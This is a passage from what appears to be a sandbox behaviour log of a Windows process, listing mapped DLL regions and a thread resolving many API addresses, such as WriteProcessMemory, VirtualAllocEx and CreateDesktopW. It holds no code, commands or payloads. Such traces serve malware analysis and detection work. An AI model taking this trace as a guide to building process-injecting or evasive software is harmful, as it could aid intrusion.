0x6c4c0000 end_va = 0x6c4d4fff monitored = 0 entry_point = 0x6c4ce570 region_type = mapped_file name = "devenum.dll" filename = "\\Windows\\SysWOW64\\devenum.dll" (normalized: "c:\\windows\\syswow64\\devenum.dll") Region: id = 759 start_va = 0x6c490000 end_va = 0x6c4b3fff monitored = 0 entry_point = 0x6c494820 region_type = mapped_file name = "winmm.dll" filename = "\\Windows\\SysWOW64\\winmm.dll" (normalized: "c:\\windows\\syswow64\\winmm.dll") Region: id = 760 start_va = 0x6c460000 end_va = 0x6c482fff monitored = 0 entry_point = 0x6c468940 region_type = mapped_file name = "winmmbase.dll" filename = "\\Windows\\SysWOW64\\winmmbase.dll" (normalized: "c:\\windows\\syswow64\\winmmbase.dll") Region: id = 761 start_va = 0x770000 end_va = 0x773fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000770000" filename = "" Region: id = 762 start_va = 0x7a0000 end_va = 0x7affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007a0000" filename = "" Region: id = 763 start_va = 0x74890000 end_va = 0x74c9afff monitored = 0 entry_point = 0x748badf0 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\SysWOW64\\setupapi.dll" (normalized: "c:\\windows\\syswow64\\setupapi.dll") Region: id = 764 start_va = 0x705a0000 end_va = 0x705c7fff monitored = 0 entry_point = 0x705a7820 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\SysWOW64\\ntmarta.dll" (normalized: "c:\\windows\\syswow64\\ntmarta.dll") Region: id = 765 start_va = 0x72640000 end_va = 0x72661fff monitored = 0 entry_point = 0x726491f0 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\SysWOW64\\devobj.dll" (normalized: "c:\\windows\\syswow64\\devobj.dll") Region: id = 766 start_va = 0x75790000 end_va = 0x757d1fff monitored = 0 entry_point = 0x757a6f10 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\SysWOW64\\wintrust.dll" (normalized: "c:\\windows\\syswow64\\wintrust.dll") Region: id = 767 start_va = 0x6c450000 end_va = 0x6c458fff monitored = 0 entry_point = 0x6c4529b0 region_type = mapped_file name = "msdmo.dll" filename = "\\Windows\\SysWOW64\\msdmo.dll" (normalized: "c:\\windows\\syswow64\\msdmo.dll") Region: id = 768 start_va = 0x6c430000 end_va = 0x6c443fff monitored = 0 entry_point = 0x6c43e190 region_type = mapped_file name = "avicap32.dll" filename = "\\Windows\\SysWOW64\\avicap32.dll" (normalized: "c:\\windows\\syswow64\\avicap32.dll") Region: id = 769 start_va = 0x6c400000 end_va = 0x6c422fff monitored = 0 entry_point = 0x6c4133e0 region_type = mapped_file name = "msvfw32.dll" filename = "\\Windows\\SysWOW64\\msvfw32.dll" (normalized: "c:\\windows\\syswow64\\msvfw32.dll") Region: id = 770 start_va = 0x6c360000 end_va = 0x6c3f1fff monitored = 0 entry_point = 0x6c36dd60 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll") Region: id = 771 start_va = 0x2cc0000 end_va = 0x2d3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002cc0000" filename = "" Region: id = 772 start_va = 0x780000 end_va = 0x780fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000780000" filename = "" Region: id = 773 start_va = 0x2d40000 end_va = 0x2dfbfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002d40000" filename = "" Region: id = 774 start_va = 0x780000 end_va = 0x783fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000780000" filename = "" Region: id = 775 start_va = 0x790000 end_va = 0x793fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000790000" filename = "" Region: id = 776 start_va = 0x7f0000 end_va = 0x7f1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007f0000" filename = "" Region: id = 777 start_va = 0x800000 end_va = 0x800fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000800000" filename = "" Region: id = 778 start_va = 0xa10000 end_va = 0xa11fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "msvfw32.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\msvfw32.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\msvfw32.dll.mui") Region: id = 779 start_va = 0xa20000 end_va = 0xa22fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "avicap32.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\avicap32.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\avicap32.dll.mui") Region: id = 780 start_va = 0x2e00000 end_va = 0x2e7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002e00000" filename = "" Region: id = 781 start_va = 0x2cc0000 end_va = 0x2cc6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002cc0000" filename = "" Region: id = 782 start_va = 0x2d30000 end_va = 0x2d3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002d30000" filename = "" Region: id = 783 start_va = 0xa10000 end_va = 0xa10fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a10000" filename = "" Region: id = 784 start_va = 0xa20000 end_va = 0xa20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a20000" filename = "" Region: id = 785 start_va = 0x2cd0000 end_va = 0x2cd0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002cd0000" filename = "" Region: id = 786 start_va = 0x2ce0000 end_va = 0x2ce0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002ce0000" filename = "" Region: id = 787 start_va = 0x2cf0000 end_va = 0x2cf0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002cf0000" filename = "" Region: id = 788 start_va = 0x2d00000 end_va = 0x2d00fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002d00000" filename = "" Thread: id = 6 os_tid = 0x50c [0144.536] GetProcAddress (hModule=0x74580000, lpProcName="LoadResource") returned 0x745976f0 [0144.536] GetProcAddress (hModule=0x74580000, lpProcName="LockResource") returned 0x74597890 [0144.536] GetProcAddress (hModule=0x74580000, lpProcName="SizeofResource") returned 0x74598f80 [0144.536] GetProcAddress (hModule=0x74580000, lpProcName="FindResourceW") returned 0x745a2a40 [0144.536] GetProcAddress (hModule=0x74580000, lpProcName="lstrcmpiA") returned 0x74597830 [0144.537] GetProcAddress (hModule=0x74580000, lpProcName="MultiByteToWideChar") returned 0x74592ad0 [0144.537] GetProcAddress (hModule=0x74580000, lpProcName="WideCharToMultiByte") returned 0x74593880 [0144.537] GetProcAddress (hModule=0x74580000, lpProcName="IsDBCSLeadByte") returned 0x7459c990 [0144.537] GetProcAddress (hModule=0x74580000, lpProcName="GetWindowsDirectoryW") returned 0x745a5120 [0144.537] GetProcAddress (hModule=0x74580000, lpProcName="HeapCreate") returned 0x7459a100 [0144.537] GetProcAddress (hModule=0x74580000, lpProcName="HeapSetInformation") returned 0x7459a8e0 [0144.537] GetProcAddress (hModule=0x74580000, lpProcName="InitOnceExecuteOnce") returned 0x774dc2d0 [0144.537] GetProcAddress (hModule=0x74580000, lpProcName="InitializeCriticalSection") returned 0x7788a200 [0144.537] GetProcAddress (hModule=0x74580000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x745a6730 [0144.537] GetProcAddress (hModule=0x74580000, lpProcName="InitializeSListHead") returned 0x77895f60 [0144.537] GetProcAddress (hModule=0x74580000, lpProcName="IsDebuggerPresent") returned 0x7459b0b0 [0144.538] GetProcAddress (hModule=0x74580000, lpProcName="IsProcessorFeaturePresent") returned 0x74599bf0 [0144.538] GetProcAddress (hModule=0x74580000, lpProcName="IsValidCodePage") returned 0x7459a790 [0144.538] GetProcAddress (hModule=0x74580000, lpProcName="IsValidLocale") returned 0x7459ab40 [0144.538] GetProcAddress (hModule=0x74580000, lpProcName="IsWow64Process") returned 0x74599f10 [0144.538] GetProcAddress (hModule=0x74580000, lpProcName="K32GetPerformanceInfo") returned 0x745c16e0 [0144.538] GetProcAddress (hModule=0x74580000, lpProcName="K32GetProcessMemoryInfo") returned 0x745c1740 [0144.538] GetProcAddress (hModule=0x74580000, lpProcName="K32QueryWorkingSetEx") returned 0x745c17c0 [0144.538] GetProcAddress (hModule=0x74580000, lpProcName="LCMapStringW") returned 0x74599f30 [0144.538] GetProcAddress (hModule=0x74580000, lpProcName="LoadLibraryExA") returned 0x7459a270 [0144.539] GetProcAddress (hModule=0x74580000, lpProcName="LoadLibraryExW") returned 0x74597930 [0144.539] GetProcAddress (hModule=0x74580000, lpProcName="LoadLibraryW") returned 0x7459a840 [0144.539] GetProcAddress (hModule=0x74580000, lpProcName="LocalFree") returned 0x745979a0 [0144.539] GetProcAddress (hModule=0x74580000, lpProcName="LockFileEx") returned 0x745a6b90 [0144.539] GetProcAddress (hModule=0x74580000, lpProcName="MapViewOfFile") returned 0x74598d60 [0144.539] GetProcAddress (hModule=0x74580000, lpProcName="MoveFileW") returned 0x7459b1d0 [0144.539] GetProcAddress (hModule=0x74580000, lpProcName="OpenProcess") returned 0x74598bf0 [0144.539] GetProcAddress (hModule=0x74580000, lpProcName="OutputDebugStringA") returned 0x7459fde0 [0144.539] GetProcAddress (hModule=0x74580000, lpProcName="OutputDebugStringW") returned 0x745c19a0 [0144.540] GetProcAddress (hModule=0x74580000, lpProcName="PeekNamedPipe") returned 0x745c19b0 [0144.540] GetProcAddress (hModule=0x74580000, lpProcName="PostQueuedCompletionStatus") returned 0x7459a880 [0144.540] GetProcAddress (hModule=0x74580000, lpProcName="ProcessIdToSessionId") returned 0x74598fa0 [0144.540] GetProcAddress (hModule=0x74580000, lpProcName="QueryDosDeviceW") returned 0x745a6ba0 [0144.540] GetProcAddress (hModule=0x74580000, lpProcName="QueryPerformanceCounter") returned 0x745938a0 [0144.540] GetProcAddress (hModule=0x74580000, lpProcName="QueryPerformanceFrequency") returned 0x74598cc0 [0144.540] GetProcAddress (hModule=0x74580000, lpProcName="QueryThreadCycleTime") returned 0x7459f2e0 [0144.540] GetProcAddress (hModule=0x74580000, lpProcName="ReadConsoleW") returned 0x745a6fe0 [0144.540] GetProcAddress (hModule=0x74580000, lpProcName="ReadFile") returned 0x745a6bb0 [0144.540] GetProcAddress (hModule=0x74580000, lpProcName="ReadProcessMemory") returned 0x745c1c80 [0144.540] GetProcAddress (hModule=0x74580000, lpProcName="RegisterWaitForSingleObject") returned 0x74599f70 [0144.541] GetProcAddress (hModule=0x74580000, lpProcName="ReleaseSRWLockExclusive") returned 0x7787d080 [0144.541] GetProcAddress (hModule=0x74580000, lpProcName="ReleaseSemaphore") returned 0x745a67b0 [0144.541] GetProcAddress (hModule=0x74580000, lpProcName="RemoveDirectoryW") returned 0x745a6bf0 [0144.541] GetProcAddress (hModule=0x74580000, lpProcName="ReplaceFileW") returned 0x745a4f60 [0144.544] GetProcAddress (hModule=0x74580000, lpProcName="ResetEvent") returned 0x745a67c0 [0144.544] GetProcAddress (hModule=0x74580000, lpProcName="ResumeThread") returned 0x7459a800 [0144.544] GetProcAddress (hModule=0x74580000, lpProcName="RtlCaptureContext") returned 0x745a6290 [0144.544] GetProcAddress (hModule=0x74580000, lpProcName="RtlCaptureStackBackTrace") returned 0x7459cc80 [0144.544] GetProcAddress (hModule=0x74580000, lpProcName="RtlUnwind") returned 0x74598c10 [0144.544] GetProcAddress (hModule=0x74580000, lpProcName="SearchPathW") returned 0x7459e790 [0144.545] GetProcAddress (hModule=0x74580000, lpProcName="SetConsoleCtrlHandler") returned 0x745a6ff0 [0144.545] GetProcAddress (hModule=0x74580000, lpProcName="SetCurrentDirectoryW") returned 0x7459fb20 [0144.545] GetProcAddress (hModule=0x74580000, lpProcName="SetEndOfFile") returned 0x745a6c00 [0144.545] GetProcAddress (hModule=0x74580000, lpProcName="SetEnvironmentVariableW") returned 0x7459e9e0 [0144.545] GetProcAddress (hModule=0x74580000, lpProcName="SetFileAttributesW") returned 0x745a6c20 [0144.545] GetProcAddress (hModule=0x74580000, lpProcName="SetFilePointerEx") returned 0x745a6c50 [0144.545] GetProcAddress (hModule=0x74580000, lpProcName="SetHandleInformation") returned 0x745a6660 [0144.545] GetProcAddress (hModule=0x74580000, lpProcName="SetInformationJobObject") returned 0x745cbd30 [0144.545] GetProcAddress (hModule=0x74580000, lpProcName="SetNamedPipeHandleState") returned 0x745c2390 [0144.545] GetProcAddress (hModule=0x74580000, lpProcName="SetProcessShutdownParameters") returned 0x7459fd70 [0144.546] GetProcAddress (hModule=0x74580000, lpProcName="SetStdHandle") returned 0x745c2430 [0144.546] GetProcAddress (hModule=0x74580000, lpProcName="SetThreadPriority") returned 0x74599990 [0144.546] GetProcAddress (hModule=0x74580000, lpProcName="SetUnhandledExceptionFilter") returned 0x7459a940 [0144.546] GetProcAddress (hModule=0x74580000, lpProcName="SignalObjectAndWait") returned 0x745c25e0 [0144.546] GetProcAddress (hModule=0x74580000, lpProcName="SleepConditionVariableSRW") returned 0x77557fb0 [0144.546] GetProcAddress (hModule=0x74580000, lpProcName="SleepEx") returned 0x745a67f0 [0144.546] GetProcAddress (hModule=0x74580000, lpProcName="GetModuleHandleA") returned 0x745999f0 [0144.546] GetProcAddress (hModule=0x74580000, lpProcName="GetProcAddress") returned 0x745978b0 [0144.546] GetProcAddress (hModule=0x74580000, lpProcName="SystemTimeToTzSpecificLocalTime") returned 0x745a5c30 [0144.546] GetProcAddress (hModule=0x74580000, lpProcName="TerminateJobObject") returned 0x745cbf40 [0144.546] GetProcAddress (hModule=0x74580000, lpProcName="TerminateProcess") returned 0x745a5100 [0144.547] GetProcAddress (hModule=0x74580000, lpProcName="TlsAlloc") returned 0x7459a120 [0144.547] GetProcAddress (hModule=0x74580000, lpProcName="TlsFree") returned 0x7459a040 [0144.547] GetProcAddress (hModule=0x74580000, lpProcName="TlsGetValue") returned 0x74591b70 [0144.547] GetProcAddress (hModule=0x74580000, lpProcName="TlsSetValue") returned 0x745929d0 [0144.547] GetProcAddress (hModule=0x74580000, lpProcName="TransactNamedPipe") returned 0x745c2600 [0144.547] GetProcAddress (hModule=0x74580000, lpProcName="TryAcquireSRWLockExclusive") returned 0x77853650 [0144.547] GetProcAddress (hModule=0x74580000, lpProcName="UnhandledExceptionFilter") returned 0x745c2670 [0144.547] GetProcAddress (hModule=0x74580000, lpProcName="UnlockFileEx") returned 0x745a6c90 [0144.547] GetProcAddress (hModule=0x74580000, lpProcName="UnmapViewOfFile") returned 0x74599b20 [0144.548] GetProcAddress (hModule=0x74580000, lpProcName="UnregisterWaitEx") returned 0x7459f310 [0144.548] GetProcAddress (hModule=0x74580000, lpProcName="VirtualAllocEx") returned 0x745c2730 [0144.548] GetProcAddress (hModule=0x74580000, lpProcName="VirtualFree") returned 0x74597600 [0144.548] GetProcAddress (hModule=0x74580000, lpProcName="VirtualFreeEx") returned 0x745c2750 [0144.548] GetProcAddress (hModule=0x74580000, lpProcName="VirtualProtectEx") returned 0x745c2790 [0144.548] GetProcAddress (hModule=0x74580000, lpProcName="VirtualQuery") returned 0x74597a90 [0144.548] GetProcAddress (hModule=0x74580000, lpProcName="VirtualQueryEx") returned 0x745c27b0 [0144.548] GetProcAddress (hModule=0x74580000, lpProcName="WaitForSingleObject") returned 0x745a6820 [0144.548] GetProcAddress (hModule=0x74580000, lpProcName="WaitForSingleObjectEx") returned 0x745a6830 [0144.548] GetProcAddress (hModule=0x74580000, lpProcName="WaitNamedPipeW") returned 0x745a5e70 [0144.548] GetProcAddress (hModule=0x74580000, lpProcName="WakeAllConditionVariable") returned 0x77898d70 [0144.549] GetProcAddress (hModule=0x74580000, lpProcName="Wow64GetThreadContext") returned 0x745c3e30 [0144.549] GetProcAddress (hModule=0x74580000, lpProcName="WriteConsoleW") returned 0x745a7020 [0144.549] GetProcAddress (hModule=0x74580000, lpProcName="WriteFile") returned 0x745a6ca0 [0144.549] GetProcAddress (hModule=0x74580000, lpProcName="WriteProcessMemory") returned 0x745c2850 [0144.549] GetProcAddress (hModule=0x74580000, lpProcName="lstrlenW") returned 0x74593690 [0144.549] GetProcAddress (hModule=0x74580000, lpProcName="GetModuleFileNameA") returned 0x7459a720 [0144.549] GetProcAddress (hModule=0x74580000, lpProcName="CreateFileW") returned 0x745a6890 [0144.549] GetProcAddress (hModule=0x74580000, lpProcName="GetConsoleMode") returned 0x745a6f70 [0144.549] GetProcAddress (hModule=0x74580000, lpProcName="GetConsoleCP") returned 0x745a6f60 [0144.549] GetProcAddress (hModule=0x74580000, lpProcName="FlushFileBuffers") returned 0x745a69b0 [0144.549] GetProcAddress (hModule=0x74580000, lpProcName="GetStringTypeW") returned 0x74597950 [0144.549] GetProcAddress (hModule=0x74580000, lpProcName="FindResourceExW") returned 0x74598ca0 [0144.550] GetProcAddress (hModule=0x74580000, lpProcName="FreeEnvironmentStringsW") returned 0x7459a7e0 [0144.550] GetProcAddress (hModule=0x74580000, lpProcName="GetEnvironmentStringsW") returned 0x7459aac0 [0144.550] GetProcAddress (hModule=0x74580000, lpProcName="GetCommandLineW") returned 0x7459aba0 [0144.550] GetProcAddress (hModule=0x74580000, lpProcName="GetCPInfo") returned 0x7459a290 [0144.550] GetProcAddress (hModule=0x74580000, lpProcName="GetOEMCP") returned 0x745a5140 [0144.550] GetProcAddress (hModule=0x74580000, lpProcName="FindNextFileA") returned 0x745a6980 [0144.550] GetProcAddress (hModule=0x74580000, lpProcName="FindFirstFileExA") returned 0x745a6930 [0144.550] GetProcAddress (hModule=0x74580000, lpProcName="FindClose") returned 0x745a68e0 [0144.550] GetProcAddress (hModule=0x74580000, lpProcName="GetFileType") returned 0x745a6aa0 [0144.550] GetProcAddress (hModule=0x74580000, lpProcName="GetACP") returned 0x74598500 [0144.550] GetProcAddress (hModule=0x74580000, lpProcName="GetStdHandle") returned 0x7459a6e0 [0144.551] GetProcAddress (hModule=0x74580000, lpProcName="GetModuleHandleExW") returned 0x7459a2b0 [0144.551] GetProcAddress (hModule=0x74580000, lpProcName="ExitProcess") returned 0x745a7b30 [0144.551] GetProcAddress (hModule=0x74580000, lpProcName="GetSystemInfo") returned 0x7459a0f0 [0144.551] GetProcAddress (hModule=0x74580000, lpProcName="FreeLibrary") returned 0x74599f50 [0144.551] GetProcAddress (hModule=0x74580000, lpProcName="GetSystemTimeAsFileTime") returned 0x74597620 [0144.551] GetProcAddress (hModule=0x74580000, lpProcName="GetCurrentProcessId") returned 0x745923e0 [0144.551] GetProcAddress (hModule=0x74580000, lpProcName="GetStartupInfoW") returned 0x7459a740 [0144.551] GetProcAddress (hModule=0x74580000, lpProcName="CreateEventW") returned 0x745a66b0 [0144.551] GetProcAddress (hModule=0x74580000, lpProcName="CloseHandle") returned 0x745a6630 [0144.551] GetProcAddress (hModule=0x74580000, lpProcName="GetCurrentProcess") returned 0x745938c0 [0144.551] GetProcAddress (hModule=0x74580000, lpProcName="EncodePointer") returned 0x7788f730 [0144.552] GetProcAddress (hModule=0x74580000, lpProcName="SwitchToThread") returned 0x7459a690 [0144.552] GetProcAddress (hModule=0x74580000, lpProcName="GetModuleHandleW") returned 0x74599bc0 [0144.552] GetProcAddress (hModule=0x74580000, lpProcName="VirtualProtect") returned 0x74597a50 [0144.552] GetProcAddress (hModule=0x74580000, lpProcName="VirtualAlloc") returned 0x74597810 [0144.552] GetProcAddress (hModule=0x74580000, lpProcName="GetCurrentThreadId") returned 0x74591b90 [0144.552] GetProcAddress (hModule=0x74580000, lpProcName="Sleep") returned 0x74597990 [0144.552] GetProcAddress (hModule=0x74580000, lpProcName="SetEvent") returned 0x745a67d0 [0144.552] GetProcAddress (hModule=0x74580000, lpProcName="DeleteCriticalSection") returned 0x77880e60 [0144.552] GetProcAddress (hModule=0x74580000, lpProcName="InitializeCriticalSectionEx") returned 0x745a6740 [0144.552] GetProcAddress (hModule=0x74580000, lpProcName="LeaveCriticalSection") returned 0x7786f210 [0144.553] GetProcAddress (hModule=0x74580000, lpProcName="EnterCriticalSection") returned 0x7786f290 [0144.553] GetProcAddress (hModule=0x74580000, lpProcName="GetProcessHeap") returned 0x74597710 [0144.553] GetProcAddress (hModule=0x74580000, lpProcName="HeapSize") returned 0x7785bb20 [0144.553] GetProcAddress (hModule=0x74580000, lpProcName="HeapFree") returned 0x74591ba0 [0144.553] GetProcAddress (hModule=0x74580000, lpProcName="HeapReAlloc") returned 0x7785efe0 [0144.553] GetProcAddress (hModule=0x74580000, lpProcName="HeapAlloc") returned 0x77862bd0 [0144.553] GetProcAddress (hModule=0x74580000, lpProcName="HeapDestroy") returned 0x745a4c30 [0144.553] GetProcAddress (hModule=0x74580000, lpProcName="SetLastError") returned 0x74592af0 [0144.553] GetProcAddress (hModule=0x74580000, lpProcName="GetLastError") returned 0x74593870 [0144.553] GetProcAddress (hModule=0x74580000, lpProcName="RaiseException") returned 0x74598c20 [0144.553] GetProcAddress (hModule=0x74580000, lpProcName="DecodePointer") returned 0x7788d830 [0144.554] GetProcAddress (hModule=0x74580000, lpProcName="SuspendThread") returned 0x7459ef60 [0144.554] GetProcAddress (hModule=0x74580000, lpProcName="GetCommandLineA") returned 0x7459ab60 [0144.554] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x74810000 [0144.554] GetProcAddress (hModule=0x74810000, lpProcName="SetThreadToken") returned 0x74820f50 [0144.554] GetProcAddress (hModule=0x74810000, lpProcName="SetSecurityInfo") returned 0x748305f0 [0144.554] GetProcAddress (hModule=0x74810000, lpProcName="SetKernelObjectSecurity") returned 0x74832d10 [0144.554] GetProcAddress (hModule=0x74810000, lpProcName="SetEntriesInAclW") returned 0x74832bf0 [0144.554] GetProcAddress (hModule=0x74810000, lpProcName="RevertToSelf") returned 0x7482fc20 [0144.554] GetProcAddress (hModule=0x74810000, lpProcName="RegSetValueExW") returned 0x7482f7f0 [0144.555] GetProcAddress (hModule=0x74810000, lpProcName="RegQueryValueExW") returned 0x7482f330 [0144.555] GetProcAddress (hModule=0x74810000, lpProcName="RegOpenKeyExW") returned 0x7482f350 [0144.555] GetProcAddress (hModule=0x74810000, lpProcName="RegDisablePredefinedCache") returned 0x748311d0 [0144.555] GetProcAddress (hModule=0x74810000, lpProcName="ConvertStringSidToSidW") returned 0x7482ddc0 [0144.555] GetProcAddress (hModule=0x74810000, lpProcName="ConvertStringSecurityDescriptorToSecurityDescriptorW") returned 0x7482cbe0 [0144.555] GetProcAddress (hModule=0x74810000, lpProcName="ConvertSidToStringSidW") returned 0x7482f060 [0144.555] GetProcAddress (hModule=0x74810000, lpProcName="AccessCheck") returned 0x74831230 [0144.555] GetProcAddress (hModule=0x74810000, lpProcName="RegSetValueExA") returned 0x74830a20 [0144.555] GetProcAddress (hModule=0x74810000, lpProcName="RegOpenKeyExA") returned 0x7482f790 [0144.555] GetProcAddress (hModule=0x74810000, lpProcName="RegEnumKeyExA") returned 0x74831810 [0144.556] GetProcAddress (hModule=0x74810000, lpProcName="RegDeleteKeyA") returned 0x748304a0 [0144.556] GetProcAddress (hModule=0x74810000, lpProcName="RegCreateKeyExA") returned 0x7482fa60 [0144.556] GetProcAddress (hModule=0x74810000, lpProcName="RegCloseKey") returned 0x7482f620 [0144.556] GetProcAddress (hModule=0x74810000, lpProcName="SetTokenInformation") returned 0x74833840 [0144.556] GetProcAddress (hModule=0x74810000, lpProcName="SystemFunction036") returned 0x74552a60 [0144.556] LoadLibraryA (lpLibFileName="GDI32.dll") returned 0x771b0000 [0144.556] GetProcAddress (hModule=0x771b0000, lpProcName="GetTextExtentPoint32A") returned 0x7725cf10 [0144.556] LoadLibraryA (lpLibFileName="ole32.dll") returned 0x753d0000 [0144.556] GetProcAddress (hModule=0x753d0000, lpProcName="CoAddRefServerProcess") returned 0x75cc0d30 [0144.556] GetProcAddress (hModule=0x753d0000, lpProcName="CoReleaseServerProcess") returned 0x75cc3950 [0144.557] GetProcAddress (hModule=0x753d0000, lpProcName="CoCreateInstance") returned 0x75c70060 [0144.557] GetProcAddress (hModule=0x753d0000, lpProcName="StringFromCLSID") returned 0x75c9dcf0 [0144.557] GetProcAddress (hModule=0x753d0000, lpProcName="CoTaskMemFree") returned 0x75c49170 [0144.557] GetProcAddress (hModule=0x753d0000, lpProcName="CoInitialize") returned 0x75401930 [0144.557] LoadLibraryA (lpLibFileName="OLEAUT32.dll") returned 0x74660000 [0144.557] GetProcAddress (hModule=0x74660000, lpProcName=0xa2) returned 0x74685250 [0144.557] GetProcAddress (hModule=0x74660000, lpProcName=0xa1) returned 0x746738b0 [0144.557] GetProcAddress (hModule=0x74660000, lpProcName=0x115) returned 0x74674910 [0144.557] GetProcAddress (hModule=0x74660000, lpProcName=0x7) returned 0x74672640 [0144.558] GetProcAddress (hModule=0x74660000, lpProcName=0x6) returned 0x74679d40 [0144.558] LoadLibraryA (lpLibFileName="SHELL32.dll") returned 0x75db0000 [0144.558] GetProcAddress (hModule=0x75db0000, lpProcName="CommandLineToArgvW") returned 0x75f5bf80 [0144.558] GetProcAddress (hModule=0x75db0000, lpProcName="SHGetFolderPathW") returned 0x75f54e80 [0144.558] GetProcAddress (hModule=0x75db0000, lpProcName="SHGetKnownFolderPath") returned 0x75f59710 [0144.558] GetProcAddress (hModule=0x75db0000, lpProcName="SHGetFileInfoA") returned 0x75f68c50 [0144.558] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x75640000 [0144.559] GetProcAddress (hModule=0x75640000, lpProcName="CharNextA") returned 0x7566e240 [0144.559] GetProcAddress (hModule=0x75640000, lpProcName="ShowWindow") returned 0x75678e60 [0144.559] GetProcAddress (hModule=0x75640000, lpProcName="MessageBoxA") returned 0x756bfec0 [0144.559] GetProcAddress (hModule=0x75640000, lpProcName="DestroyWindow") returned 0x744e14e0 [0144.559] GetProcAddress (hModule=0x75640000, lpProcName="PostThreadMessageA") returned 0x75674810 [0144.559] GetProcAddress (hModule=0x75640000, lpProcName="GetDlgItem") returned 0x7566cc40 [0144.559] GetProcAddress (hModule=0x75640000, lpProcName="AllowSetForegroundWindow") returned 0x75674b10 [0144.559] GetProcAddress (hModule=0x75640000, lpProcName="ReleaseDC") returned 0x744da580 [0144.559] GetProcAddress (hModule=0x75640000, lpProcName="GetDC") returned 0x744da680 [0144.560] GetProcAddress (hModule=0x75640000, lpProcName="EnableWindow") returned 0x756729d0 [0144.560] GetProcAddress (hModule=0x75640000, lpProcName="IsWindowVisible") returned 0x75675960 [0144.607] GetProcAddress (hModule=0x75640000, lpProcName="SendMessageA") returned 0x7566a220 [0144.607] GetProcAddress (hModule=0x75640000, lpProcName="RegisterClassW") returned 0x75659800 [0144.608] GetProcAddress (hModule=0x75640000, lpProcName="PostMessageW") returned 0x7565d700 [0144.608] GetProcAddress (hModule=0x75640000, lpProcName="IsWindow") returned 0x75658f70 [0144.608] GetProcAddress (hModule=0x75640000, lpProcName="GetWindowThreadProcessId") returned 0x7565da50 [0144.608] GetProcAddress (hModule=0x75640000, lpProcName="GetUserObjectInformationW") returned 0x75678fa0 [0144.608] GetProcAddress (hModule=0x75640000, lpProcName="GetThreadDesktop") returned 0x75679110 [0144.608] GetProcAddress (hModule=0x75640000, lpProcName="GetProcessWindowStation") returned 0x75678b10 [0144.608] GetProcAddress (hModule=0x75640000, lpProcName="GetMessageW") returned 0x75674f60 [0144.608] GetProcAddress (hModule=0x75640000, lpProcName="FindWindowExW") returned 0x75674110 [0144.609] GetProcAddress (hModule=0x75640000, lpProcName="DispatchMessageW") returned 0x756562e0 [0144.609] GetProcAddress (hModule=0x75640000, lpProcName="DefWindowProcW") returned 0x744e07e0 [0144.609] GetProcAddress (hModule=0x75640000, lpProcName="CreateWindowStationW") returned 0x7569c280 [0144.609] GetProcAddress (hModule=0x75640000, lpProcName="CreateWindowExW") returned 0x75659860 [0144.609] GetProcAddress (hModule=0x75640000, lpProcName="CreateDesktopW") returned 0x7569c200 [0144.609] GetProcAddress (hModule=0x75640000, lpProcName="CloseWindowStation") returned 0x75679430 [0144.609] GetProcAddress (hModule=0x75640000, lpProcName="CloseDesktop") returned 0x75679340 [0144.610] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x4, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x2) returned 1 [0144.610] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x2, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x4) returned 1 [0144.637] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x19ff64 | out: lpSystemTimeAsFileTime=0x19ff64*(dwLowDateTime=0x77f77654, dwHighDateTime=0x1d86dce)) [0144.637] GetCurrentThreadId () returned 0x50c [0144.637] GetCurrentProcessId () returned 0x528 [0144.637] QueryPerformanceCounter (in: lpPerformanceCount=0x19ff5c | out: lpPerformanceCount=0x19ff5c*=2226692983285) returned 1 [0144.637] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0144.639] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x77420000 [0144.639] GetProcAddress (hModule=0x77420000, lpProcName="InitializeCriticalSectionEx") returned 0x774dd740 [0144.639] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x77420000 [0144.640] GetProcAddress (hModule=0x77420000, lpProcName="FlsAlloc") returned 